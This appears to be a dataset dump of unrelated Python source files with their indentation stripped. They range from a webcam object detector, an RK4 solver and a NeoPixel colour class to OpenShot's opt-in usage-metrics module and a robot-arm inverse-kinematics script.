with open("hour_logs.csv", "r") as f:
reader = csv.reader(f)
data = [row for row in reader]
del data[0]
rows = len(data) #this is the way you decide the number of rows in a list
total_entries = rows
columns = len(data[0]) # this is the way to determine the nmumber of columns in the list
add = 0
for i in range(rows):
print("The sum before add is :", add)
add = add + int(data[i][6])
if((int(data[i][6])) == 0):
total_entries = total_entries - 1
#del data[0]
print("The final addition is:", add)
print("The total number of entries are :", total_entries)
if(total_entries):
hour_average = add/total_entries
else:
hour_average = 0
hour_average = int(hour_average)
csv_write('day_logs.csv', 'a',hour_counter, {'YEAR': str(YEAR), 'MONTH': str(MONTH), 'DATE': str(DATE), 'HOUR': str(HOUR), 'MINUTES': str(MINUTES), 'SECONDS':str(SECONDS), 'NUMBER':str(hour_average)})
if((day_temp - DATE) != 0):
DAY_FLAG = 0
with open("hour_logs.csv", "r") as f:
reader = csv.reader(f)
data = [row for row in reader]
del data[0]
rows = len(data) #this is the way you decide the number of rows in a list
total_entries = rows
columns = len(data[0]) # this is the way to determine the nmumber of columns in the list
add = 0
for i in range(rows):
print("The sum before add is :", add)
add = add + int(data[i][6])
if((int(data[i][6])) == 0):
total_entries = total_entries - 1
#del data[0]
print("The final addition is:", add)
print("The total number of entries are :", total_entries)
if(total_entries):
day_average = add/total_entries
else:
day_average = 0
day_average = int(hour_average)
csv_write('day_logs.csv', 'a',hour_counter, {'YEAR': str(YEAR), 'MONTH': str(MONTH), 'DATE': str(DATE), 'HOUR': str(HOUR), 'MINUTES': str(MINUTES), 'SECONDS':str(SECONDS), 'NUMBER':str(day_average)})
# Draw the results of the detection (aka 'visulaize the results')
vis_util.visualize_boxes_and_labels_on_image_array(
frame,
np.squeeze(boxes),
np.squeeze(classes).astype(np.int32),
np.squeeze(scores),
category_index,
use_normalized_coordinates=True,
line_thickness=8,
min_score_thresh=0.40)
cv2.putText(frame,"FPS: {0:.2f}".format(frame_rate_calc),(30,50),font,1,(255,255,0),2,cv2.LINE_AA)
verbose_classes = [category_index.get(i) for i in classes[0]]
# All the results have been drawn on the frame, so it's time to display it.
cv2.imshow('Object detector', frame)
t2 = cv2.getTickCount()
time1 = (t2-t1)/freq
frame_rate_calc = 1/time1
# Press 'q' to quit
if cv2.waitKey(1) == ord('q'):
break
rawCapture.truncate(0)
camera.close()
### USB webcam ###
elif camera_type == 'usb':
# Initialize USB webcam feed
camera = cv2.VideoCapture(0)
ret = camera.set(3,IM_WIDTH)
ret = camera.set(4,IM_HEIGHT)
while(True):
t1 = cv2.getTickCount()
# Acquire frame and expand frame dimensions to have shape: [1, None, None, 3]
# i.e. a single-column array, where each item in the column has the pixel RGB value
ret, frame = camera.read()
frame_expanded = np.expand_dims(frame, axis=0)
# Perform the actual detection by running the model with the image as input
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores, detection_classes, num_detections],
feed_dict={image_tensor: frame_expanded})
# Draw the results of the detection (aka 'visulaize the results')
vis_util.visualize_boxes_and_labels_on_image_array(
frame,
np.squeeze(boxes),
np.squeeze(classes).astype(np.int32),
np.squeeze(scores),
category_index,
use_normalized_coordinates=True,
line_thickness=8,
min_score_thresh=0.85)
cv2.putText(frame,"FPS: {0:.2f}".format(frame_rate_calc),(30,50),font,1,(255,255,0),2,cv2.LINE_AA)
# All the results have been drawn on the frame, so it's time to display it.
cv2.imshow('Object detector', frame)
t2 = cv2.getTickCount()
time1 = (t2-t1)/freq
frame_rate_calc = 1/time1
# Press 'q' to quit
if cv2.waitKey(1) == ord('q'):
break
camera.release()
cv2.destroyAllWindows()
|
"""calculate the diffs for mathdiff.py and tablediff.py"""
import py
def dodiff(v1, v2, func=None, thelimit=0):
"""find the diff between v1 and v2. func is the function used to find the diff
1. text diff
a. if same, use v1
return (v1, False)
b. if diff, use v1 and mark as err
return (v1, isdiff=False)
or
return ((v1, v2), isdiff=True)
2. perc diff
a. if idential:
return 0
b. if in thelimit:
return (diff, isdiff=False)
c. else:
return (diff, isdiff=True)
3. delta diff
a. if idential
return 0
b. if in thelimit:
return (diff, isdiff=False)
c. else:
return (diff, isdiff=True)
"""
# 1
if v1 == v2:
try:
f1, f2 = float(v1), float(v2) #2a and 3a
return (0, False)
except ValueError, e:
return (v1, False) #1a
else:
try:
f1, f2 = float(v1), float(v2)
if not func:
return (f2 - f1, True)
else:
return func(f1, f2, thelimit) #2b, 2c, 3b, 3c
except ValueError, e:
return ((v1, v2), True) #1b
def deltdiff(v1, v2, deltdifflimit=0):
"""finds the delta diff, returns (diff, isdiff) isdiff is true if diff is over the limit"""
diff = v2 - v1
if abs(diff) > abs(deltdifflimit):
isdiff = True
else:
isdiff = False
return (diff, isdiff)
def percdiff(v1, v2, percdifflimit=0):
"""finds the perc diff, returns (diff, isdiff) isdiff is True if diff is over the limit"""
v1, v2 = float(v1), float(v2)
if v1 == 0 and v2 == 0:
return (0.0, False)
# TODO : what to return when v1 = 0 ??
diff = (v2 - v1) / v1 * 100
if abs(diff) > abs(percdifflimit):
isdiff = True
else:
isdiff = False
return (diff, isdiff)
def equal_matrixsize(mat1, mat2):
"""return true if the mat1 and mat2 have same configuration of cells"""
if mat1 == mat2: return True
if len(mat1) == len(mat2):
for i in range(len(mat1)):
if len(mat1[i]) == len(mat2[i]):
pass
else:
return False
else:
return False
return True
class MatrixSizeError(Exception):
pass
def tablediff(table1, table2, func=None, thelimit=0):
"""return a difftable that is the difference between table1 and table2
each cell in difftable will have the diff between corresponding cell in tabl1 and table2
diff will be in the following format -> (thediff, isDiff) where
thediff is the difference between the cells, isdiff is True if thediff > thelimit
the diff is calculated using func. If func= None: thediff = cell2-cell1"""
# TODO : check if the two tables have same dimensions
if not equal_matrixsize(table1, table2):
raise MatrixSizeError, "the sizes of the two tables do not match"
thetable = []
for row1, row2 in zip(table1, table2):
therow = []
for cell1, cell2 in zip(row1, row2):
thecell = dodiff(cell1, cell2, func, thelimit)
therow.append(thecell)
thetable.append(therow)
return thetable
|
from django.contrib import admin
from .models import Service
class ServicesAdmin(admin.ModelAdmin):
list_display = ['order_by','title', 'slug', 'is_published']
list_display_links = ('title', 'slug',)
list_editable = ('order_by','is_published',)
prepopulated_fields = {'slug': ('title',)}
admin.site.register(Service, ServicesAdmin)
|
from __future__ import division
class PixelColor(object):
"""
Represents a single neopixel color (either RGB or RGBW).
The ``red``, ``blue``, ``green``, and ``white`` components can either be
between 0 and 1 (normalized), or between 0 and 255. PixelColor will
attempt to determine automatically whether the components are normalized,
but this can be forced with ``normalized``.
All object attributes are read-only.
:param red: (float|int) Red component.
:param green: (float|int) Green component.
:param blue: (float|int) Blue component.
:param white: (float|int) White component (set to ``None`` if RGB only).
:param normalized: (bool) Whether the color is normalized (will be guessed
if ``None``).
"""
def __init__(self, red=0, green=0, blue=0, white=None, normalized=None):
self._red = red
self._green = green
self._blue = blue
self._white = white
self._normalized = normalized
if normalized is None:
# We're guessing whether the input is normalized (between 0 and 1)
# or not. If any component is greater than 1 then we assume that
# the input is not normalized.
white_test = 0 if white is None else white
self._normalized = not (
red > 1 or green > 1 or blue > 1 or white_test > 1
)
def __repr__(self):
return '{}(red={}, green={}, blue={}, {}normalized={})'.format(
self.__class__.__name__,
self.red, self.green, self.blue,
'' if self.is_rgb else 'white={}, '.format(self.white),
self.is_normalized
)
def __str__(self):
if self._normalized:
formatter = ('{}(red={:.5g}, green={:.5g}, blue={:.5g}, '
'{}normalized={})')
else:
formatter = '{}(red={}, green={}, blue={}, {}normalized={})'
white_str = ''
if self.is_rgbw:
white_str = (
'white={:.5g}, '.format(self.white) if self.is_normalized
else 'white={}, '.format(self.white)
)
return formatter.format(
self.__class__.__name__,
self.red, self.green, self.blue, white_str,
self.is_normalized
)
def _normalize(self, val):
"""
Normalizes a single color component. Does nothing if the component
is already normalized.
:param val: (float|int) The component value to convert.
:return: (int) A normalized value between 0 and 1.
"""
if self.is_normalized:
return val
else:
return float(val / 255)
def _denormalize(self, val):
"""
Denormalizes a single color component. Does nothing if the component
is already denormalized.
:param val: (float|int) The component value to convert.
:return: (int) A denormalized value between 0 and 255.
"""
if self.is_normalized:
return int(val * 255)
else:
return val
def _sanitize_component(self, val):
"""
Sanitize a component value. Denormalized values will always be
returned as integers. Normalized values are clipped between 0.0 and
1.0.
:param val: (float|int) Component value to sanitize.
:return: (float|int) Sanitized values.
"""
if self.is_normalized:
# Lock normalized values between 0 and 1.
if val < 0:
return 0.0
if val > 1:
return 1.0
return val
else:
# Lock denormalized values between 0 and 255.
if val < 0:
return 0
if val > 255:
return 255
return int(val)
@property
def red(self):
"""
(float|int) The red component.
"""
return self._sanitize_component(self._red)
@property
def green(self):
"""
(float|int) The green component.
"""
return self._sanitize_component(self._green)
@property
def blue(self):
"""
(float|int) The blue component.
"""
return self._sanitize_component(self._blue)
@property
def white(self):
"""
(float|int) The white component.
"""
if self._white is None:
return None
return self._sanitize_component(self._white)
@property
def is_normalized(self):
"""
(bool) Whether the color is normalized.
"""
return self._normalized
@property
def is_rgb(self):
"""
(bool) Whether the color is RGB only.
"""
return self.white is None
@property
def is_rgbw(self):
"""
(bool) Whether the color is RGBW.
"""
return self.white is not None
@property
def components(self):
"""
The color as a tuple of RGB(W) component values. Values will either be
normalized or denormalized to match ``is_normalized``.
"""
if self.is_rgb:
return self.red, self.green, self.blue
else:
return self.red, self.green, self.blue, self.white
@property
def components_normalized(self):
"""
The color as a tuple of normalized RGB(W) component values.
"""
if self.is_rgb:
return (
self._normalize(self.red),
self._normalize(self.green),
self._normalize(self.blue),
)
else:
return (
self._normalize(self.red),
self._normalize(self.green),
self._normalize(self.blue),
self._normalize(self.white),
)
@property
def components_denormalized(self):
"""
The color as a tuple of denormalized RGB(W) component values.
"""
if self.is_rgb:
return (
self._denormalize(self.red),
self._denormalize(self.green),
self._denormalize(self.blue),
)
else:
return (
self._denormalize(self.red),
self._denormalize(self.green),
self._denormalize(self.blue),
self._denormalize(self.white),
)
@property
def hardware_components(self):
"""
The color as a tuple of integers suitable for passing to
``Adafruit_NeoPixel.setPixelColorRGB()`` for display on neopixel
hardware.
"""
return self.components_denormalized
@property
def hardware_int(self):
"""
The color as an integer suitable for passing to
``Adafruit_NeoPixel.setPixelColor()`` for display on neopixel hardware.
"""
if self.is_rgb:
return (
self._denormalize(self.red) << 16 |
self._denormalize(self.green) << 8 |
self._denormalize(self.blue)
)
else:
return (
self._denormalize(self.white) << 24 |
self._denormalize(self.red) << 16 |
self._denormalize(self.green) << 8 |
self._denormalize(self.blue)
)
|
import numpy as np
from matplotlib import pyplot as plt
import math
class ODESolver:
def __init__(self,F):
self.F = F
def set_Inital_Conditions(self,y):
self.y = y
def solve(self, x, interval_stop, step):
self.interval_start = x
self.interval_stop = interval_stop
self.step = step
X = []
Y = []
X.append(self.interval_start)
Y.append(self.y)
while x < interval_stop:
self.y = self.y + self.advance()
x = x + step
X.append(x)
Y.append(self.y)
return np.array(X), np.array(Y)
def advance(self):
raise NotImplementedError
class RK4(ODESolver):
def advance(self):
F,x,y,step = self.F, self.interval_start, self.y, self.step
K0 = step*F(x,y)
K1 = step*F(x + step/2.0, y + K0/2.0)
K2 = step*F(x+step/2.0, y+ K1/2.0)
K3 = step*F(x+step,y+K2)
return (K0 + 2.0*K1 + 2.0*K2 + K3)/6
g = 9.81
d = 0.063
m = 0.05
air_density = 1.28
v0 = 25.0
theta = 15.0
omega = 20.0
alpha = (air_density * math.pi * d**2)/ (8 * m)
eta = 0
x = 0.0
xStop = 40
y = np.array([0, v0*math.cos(math.radians(theta)), 1, v0*math.sin(math.radians(theta))])
h = 0.01
def F(x,y):
F = np.zeros(4)
v = math.sqrt((y[1]**2)+(y[3]**2))
C_D = 0.508 + (1/(22.064 + 4.196*(v/omega)**(5/2)))**(2/5)
C_M = (1 / (2.022 + 0.981*(v/omega)))
F[0] = y[1]
F[1] = (-C_D*alpha*v*y[1]) + (eta*C_M*alpha*v*(y[3]**2)*y[3])
F[2] = y[3]
F[3] = (-g)-(C_D*alpha*v*y[3]) - (eta*C_M*alpha*v*y[1])
return F
solver = RK4(F)
solver.set_Inital_Conditions(y)
X, Y = solver.solve(x,xStop,h)
print(Y[:,0])
# np.savetxt("notopspinX.csv",X,delimiter=',')
# np.savetxt("notopspinY.csv",Y,delimiter=',')
plt.plot(Y[:,0], Y[:,2])
plt.show() |
from reddit import client
from reddit.user import User
from reddit.reddits import Subreddit
Donzuh = client.login('Donzuh')
Donzuh.me()
# python = Subreddit("python")
#
# python.hot()
|
# coding: utf-8
import sys
sys.path.append('..')
sys.path.append('../src')
import learner
import config
if __name__ == "__main__":
if len(sys.argv) < 2 or sys.argv[1] not in ["train", "play"]:
print("[USAGE] python leaner_test.py train|play")
exit(1)
alpha_zero = learner.Leaner(config.config)
if sys.argv[1] == "train":
alpha_zero.learn()
elif sys.argv[1] == "play":
for i in range(10):
print("GAME: {}".format(i + 1))
alpha_zero.play_with_human(human_first=i % 2)
|
import string
step=int(input("Please enter step for Cesar code: "))
lowercase_leters=list(string.ascii_lowercase)
cesar=dict(zip(lowercase_leters,lowercase_leters[step:]+lowercase_leters[:step]))
print("Cesar code with step %i is:" % step, cesar) |
from typing import TextIO
def setup_lights(writer: TextIO):
_place_light(writer, 1.3, 2.4, 0.8)
_place_light(writer, 1.3, 2.4, 1.5)
_place_light(writer, 1.3, 2.4, 2.2)
def _place_light(writer: TextIO, x, y, z):
writer.write(f"""
light_source {{
<{x},{y},{z}>
color Gray50
}}
// looks_like {{ Lightbulb }}
""")
|
# -------------------------------------------------------------------------------------
# Calls contour data set training script with different gaussian regularization
# loss weights.
# -------------------------------------------------------------------------------------
import numpy as np
import torch
from train_contour_data_set import main
import models.new_piech_models as new_piech_models
if __name__ == '__main__':
random_seed = 10
torch.manual_seed(random_seed)
np.random.seed(random_seed)
gaussian_reg_weight_arr = [0.1, 0.01, 0.001, 0.0001, 0.00001, 0.000001]
# ----------------------------------------------------------------------
data_set_parameters = {
'data_set_dir': "./data/channel_wise_optimal_full14_frag7",
'train_subset_size': 20000,
'test_subset_size': 2000
}
for loss_weight in gaussian_reg_weight_arr:
print("Processing gaussian regularization with width = {} {}".format(loss_weight, '*' * 40))
train_parameters = {
'random_seed': random_seed,
'train_batch_size': 32,
'test_batch_size': 32,
'learning_rate': 1e-4,
'num_epochs': 100,
'lateral_w_reg_weight': loss_weight,
'lateral_w_reg_gaussian_sigma': 10,
'clip_negative_lateral_weights': True,
'lr_sched_step_size': 80,
'lr_sched_gamma': 0.5
}
base_results_dir = './results/gaussian_reg_loss_weight_explore/weight_{}'.format(loss_weight)
cont_int_layer = new_piech_models.CurrentSubtractInhibitLayer(
lateral_e_size=15, lateral_i_size=15, n_iters=5, use_recurrent_batch_norm=True)
model = new_piech_models.ContourIntegrationResnet50(cont_int_layer)
main(
model,
data_set_params=data_set_parameters,
train_params=train_parameters,
base_results_store_dir=base_results_dir
)
# ----------------------------------------------------------------------
import pdb
pdb.set_trace()
|
"""
@file
@brief This file sends anonymous application metrics and errors over HTTP
@author Jonathan Thomas <jonathan@openshot.org>
@section LICENSE
Copyright (c) 2008-2018 OpenShot Studios, LLC
(http://www.openshotstudios.com). This file is part of
OpenShot Video Editor (http://www.openshot.org), an open-source project
dedicated to delivering high quality video editing and animation solutions
to the world.
OpenShot Video Editor is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
OpenShot Video Editor is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with OpenShot Library. If not, see <http://www.gnu.org/licenses/>.
"""
# idna encoding import required to prevent bug (unknown encoding: idna)
import encodings.idna
import requests
import platform
import threading
import urllib.parse
from copy import deepcopy
from classes import info
from classes import language
from classes.logger import log
from classes import settings
import openshot
from PyQt5.QtCore import QT_VERSION_STR
from PyQt5.QtCore import PYQT_VERSION_STR
# Get settings
s = settings.get_settings()
# Determine OS version
os_version = "X11; Linux %s" % platform.machine()
linux_distro = "None"
try:
if platform.system() == "Darwin":
v = platform.mac_ver()
os_version = "Macintosh; Intel Mac OS X %s" % v[0].replace(".", "_")
linux_distro = "OS X %s" % v[0]
elif platform.system() == "Windows":
v = platform.win32_ver()
# TODO: Upgrade windows python (on build server) version to 3.5, so it correctly identifies Windows 10
os_version = "Windows NT %s; %s" % (v[0], v[1])
linux_distro = "Windows %s" % "-".join(platform.win32_ver())
elif platform.system() == "Linux":
# Get the distro name and version (if any)
linux_distro = "-".join(platform.linux_distribution())
except Exception as Ex:
log.error("Error determining OS version in metrics.py")
# Build user-agent
user_agent = "Mozilla/5.0 (%s) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36" % os_version
params = {
"cid": s.get("unique_install_id"), # Unique install ID
"v": 1, # Google Measurement API version
"tid": "UA-4381101-5", # Google Analytic Tracking ID
"an": info.PRODUCT_NAME, # App Name
"aip": 1, # Anonymize IP
"aid": "org.openshot.%s" % info.NAME, # App ID
"av": info.VERSION, # App Version
"ul": language.get_current_locale().replace('_', '-').lower(), # Current Locale
"ua": user_agent, # Custom User Agent (for OS, Processor, and OS version)
"cd1": "1.0.0", #openshot.OPENSHOT_VERSION_FULL, # Dimension 1: libopenshot version
"cd2": platform.python_version(), # Dimension 2: python version (i.e. 3.4.3)
"cd3": QT_VERSION_STR, # Dimension 3: qt5 version (i.e. 5.2.1)
"cd4": PYQT_VERSION_STR, # Dimension 4: pyqt5 version (i.e. 5.2.1)
"cd5": linux_distro
}
def track_metric_screen(screen_name):
"""Track a GUI screen being shown"""
metric_params = deepcopy(params)
metric_params["t"] = "screenview"
metric_params["cd"] = screen_name
metric_params["cid"] = s.get("unique_install_id")
t = threading.Thread(target=send_metric, args=[metric_params])
t.start()
def track_metric_event(event_action, event_label, event_category="General", event_value=0):
"""Track a GUI screen being shown"""
metric_params = deepcopy(params)
metric_params["t"] = "event"
metric_params["ec"] = event_category
metric_params["ea"] = event_action
metric_params["el"] = event_label
metric_params["ev"] = event_value
metric_params["cid"] = s.get("unique_install_id")
t = threading.Thread(target=send_metric, args=[metric_params])
t.start()
def track_metric_error(error_name, is_fatal=False):
"""Track an error has occurred"""
metric_params = deepcopy(params)
metric_params["t"] = "exception"
metric_params["exd"] = error_name
metric_params["exf"] = 0
if is_fatal:
metric_params["exf"] = 1
t = threading.Thread(target=send_metric, args=[metric_params])
t.start()
def track_exception_stacktrace(stacktrace, source):
"""Track an exception/stacktrace has occurred"""
t = threading.Thread(target=send_exception, args=[stacktrace, source])
t.start()
def track_metric_session(is_start=True):
"""Track a GUI screen being shown"""
metric_params = deepcopy(params)
metric_params["t"] = "screenview"
metric_params["sc"] = "start"
metric_params["cd"] = "launch-app"
metric_params["cid"] = s.get("unique_install_id")
if not is_start:
metric_params["sc"] = "end"
metric_params["cd"] = "close-app"
t = threading.Thread(target=send_metric, args=[metric_params])
t.start()
def send_metric(params):
"""Send anonymous metric over HTTP for tracking"""
# Check if the user wants to send metrics and errors
if s.get("send_metrics"):
url_params = urllib.parse.urlencode(params)
url = "http://www.google-analytics.com/collect?%s" % url_params
# Send metric HTTP data
try:
r = requests.get(url, headers={"user-agent": user_agent}, verify=False)
log.info("Track metric: [%s] %s | (%s bytes)" % (r.status_code, r.url, len(r.content)))
except Exception as Ex:
log.error("Failed to Track metric: %s" % (Ex))
def send_exception(stacktrace, source):
"""Send exception stacktrace over HTTP for tracking"""
# Check if the user wants to send metrics and errors
if s.get("send_metrics"):
data = urllib.parse.urlencode({"stacktrace": stacktrace,
"platform": platform.system(),
"version": info.VERSION,
"source": source,
"unique_install_id": s.get("unique_install_id")})
url = "http://www.openshot.org/exception/json/"
# Send exception HTTP data
try:
r = requests.post(url, data=data, headers={"user-agent": user_agent, "content-type": "application/x-www-form-urlencoded"}, verify=False)
log.info("Track exception: [%s] %s | %s" % (r.status_code, r.url, r.text))
except Exception as Ex:
log.error("Failed to Track exception: %s" % (Ex))
|
# Copyright 2008-2018 Rumma & Ko Ltd
# License: GNU Affero General Public License v3 (see file COPYING for details)
"""These are the plugins included with Lino XL.
Contacts management
===================
.. autosummary::
:toctree:
countries
contacts
addresses
phones
households
humanlinks
cv
dupable_partners
Groupware
=========
.. autosummary::
:toctree:
boards
teams
lists
groups
topics
deploy
tickets
skills
working
votes
Calendar functionalities
========================
.. autosummary::
:toctree:
cal
calview
extensible
reception
rooms
courses
Office functionalities
======================
.. autosummary::
:toctree:
notes
outbox
postings
mailbox
caldav
ERP
===
.. autosummary::
:toctree:
products
orders
shopping
System extensions
=================
.. autosummary::
:toctree:
appypod
excerpts
stars
userstats
Miscellaneous
=============
.. autosummary::
:toctree:
beid
polls
clients
coachings
trends
Content management
==================
.. autosummary::
:toctree:
blogs
pages
Accounting stuff
================
.. autosummary::
:toctree:
b2c
ledger
sales
finan
tim2lino
sepa
invoicing
vat
vatless
bevat
bevats
eevat
ana
sheets
Plugin namespaces
=======================
(See :ref:`plugin_namespaces`).
.. autosummary::
:toctree:
statbel
online
Experimental and not much used
==============================
.. autosummary::
:toctree:
concepts
eid_jslib
thirds
events
families
properties
inspect
"""
|
from cvxopt import blas, lapack, solvers
from cvxopt import matrix, spdiag, mul, div, sparse
from cvxopt import spmatrix, sqrt, base
import numpy as np
"""
2x + y + 3z = 1
2x + 6y + 8z = 3
6x + 8y + 18z = 5
Solution:
(x, y, z) = ( 3/10, 2/5, 0)
CVXOPT cvxopt.lapack.gesv(A, B[, ipiv = None]) Solves
A X = B,
where A and B are real or complex matrices, with A square and nonsingular.
On entry, B contains the right-hand side B; on exit it contains the solution X.
To run:
python pyalad/test_linear_solver.py
"""
tA = np.array([[2, 1, 3],
[2, 6, 8],
[6, 8, 18]], dtype=float)
tb = np.array([1, 3, 5], dtype=float)
print tA
print tb
A = matrix(tA)
b = matrix(tb)
print A
print b
x = matrix(b)
print x
lapack.gesv(A, x)
print A * x
print (3./10, 2./5, 0)
|
import os
os.chdir(os.path.dirname(__file__))
dirs = ["data", "data/requirements_xml"]
[os.mkdir(n) for n in dirs if not os.path.exists(n)]
|
from pilco.models import SMGPR
import numpy as np
import os
import oct2py
octave = oct2py.Oct2Py()
dir_path = os.path.dirname(os.path.realpath("__file__")) + "/tests/Matlab Code"
octave.addpath(dir_path)
from gpflow import config
float_type = config.default_float()
def test_sparse_predictions():
np.random.seed(0)
d = 3 # Input dimension
k = 2 # Number of outputs
# Training Dataset
X0 = np.random.rand(100, d)
A = np.random.rand(d, k)
Y0 = np.sin(X0).dot(A) + 1e-3*(np.random.rand(100, k) - 0.5) # Just something smooth
smgpr = SMGPR((X0, Y0), num_induced_points=30)
smgpr.optimize()
# Generate input
m = np.random.rand(1, d) # But MATLAB defines it as m'
s = np.random.rand(d, d)
s = s.dot(s.T) # Make s positive semidefinite
M, S, V = smgpr.predict_on_noisy_inputs(m, s)
# convert data to the struct expected by the MATLAB implementation
lengthscales = np.stack([model.kernel.lengthscales for model in smgpr.models])
variance = np.stack([model.kernel.variance for model in smgpr.models])
noise = np.stack([model.likelihood.variance for model in smgpr.models])
hyp = np.log(np.hstack(
(lengthscales,
np.sqrt(variance[:, None]),
np.sqrt(noise[:, None]))
)).T
gpmodel = oct2py.io.Struct()
gpmodel.hyp = hyp
gpmodel.inputs = X0
gpmodel.targets = Y0
gpmodel.induce = smgpr.Z.numpy()
# Call function in octave
M_mat, S_mat, V_mat = octave.gp1(gpmodel, m.T, s, nout=3)
assert M.shape == M_mat.T.shape
assert S.shape == S_mat.shape
assert V.shape == V_mat.shape
np.testing.assert_allclose(M, M_mat.T, rtol=1e-4)
np.testing.assert_allclose(S, S_mat, rtol=1e-4)
np.testing.assert_allclose(V, V_mat, rtol=1e-4)
if __name__ == '__main__':
test_sparse_predictions()
|
#!/usr/bin/env python
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
mm |<----84---->|
|<---60--->| |
|____ | |
J3 /o____|=o=o=__+__ _____
/ / )d | | | lenPump 78
/ / _|o|_ ___|_
/ / (x,y,z)
/ /
/ / J2 to J3 250, smallArm
/ /
/ /
/ /
/o/ )c <-------J2------———————
| | | J1 to J2 218 big arm
| | |
| | |
| | |
| | |
_________| | |
| o| )b <-------J1------———————
J0 |o )a | | J1 to base 10
(((((((((|o|)))))))))))))) |
|o| |
(((((((((|o|)))))))))))))) _......Base.....______|_
| |
|<--102-->| J0 to J1
a,b,c,d: jointAngle
(x,y,z): endpoint postion
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
from math import acos, isnan, pi, atan2, sqrt, sin, cos
MATH_TRANS = 180/pi
MATH_LOWER_ARM = 218
MATH_UPPER_ARM = 250
class robot_arm_ik():
# def __init__(self):
def postion_to_angle(self, postion, angle): # postion (mm), angle (degree)
x = postion[0]
y = postion[1]
z = postion[2]
if y == 0:
theta1_degree = 0
elif y < 0:
theta1_degree = - atan2(x,y)*MATH_TRANS
elif y > 0:
theta1_degree = atan2(x,y)*MATH_TRANS
r_offset = 100 + 95 # mm 95.3/94 = motor2[DH_a], 39.22=suctionCup_DummyB[x]-auxMotor2[x]
z_offset = 100 - 70# mm 71=(317.44-246.12)# 103 = motor2[y] = motor1[y]+motor2[DH_d], (317.44-246.12)=auxMotor2[y]-suctionCup_DummyB[y]
r = sqrt(x**2 + y**2) - r_offset # X
s = z - z_offset # Y
if r < 0:
print("r={:}, s={:}".format(r,s))
return False
if sqrt(s ** 2 + r ** 2) > (MATH_LOWER_ARM + MATH_UPPER_ARM):
print("too far to move")
return False
D = (s ** 2 + r ** 2 - MATH_LOWER_ARM ** 2 - MATH_UPPER_ARM ** 2) / (2 * MATH_LOWER_ARM * MATH_UPPER_ARM)
theta3 = acos(D)
theta2 = atan2(s,r) + atan2(MATH_UPPER_ARM*sin(theta3),MATH_LOWER_ARM + MATH_UPPER_ARM*cos(theta3))
theta2_degree = theta2*MATH_TRANS
theta3_degree = theta3*MATH_TRANS
# print("theta1={:f}, theta2={:f}, theta3={:f}".format(theta1_degree, theta2_degree, theta3_degree))
angle[0] = theta1_degree
angle[1] = theta2_degree
angle[2] = theta3_degree
return True
def armAngle_to_motorAngle(self, angle):
return (angle[0], angle[1], angle[1] - angle[2])
# return (angle[0], angle[1], angle[2])
# motor[0] = angle[0] # motor 1
# motor[1] = angle[1] # motor 2
# motor[2] = angle[2] - angle[1] # motor 3
if __name__=="__main__":
try:
ik = robot_arm_ik()
postion=[426.35,146.80,253.52]
angle=[0,0,0]
motor=[0,0,0]
ik.robot_arm_ik(postion,angle)
print("angle={:.2f},{:.2f}, {:.2f}".format(angle[0], angle[1], angle[2]))
except Exception as e:
print(e)
finally:
print("quit")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.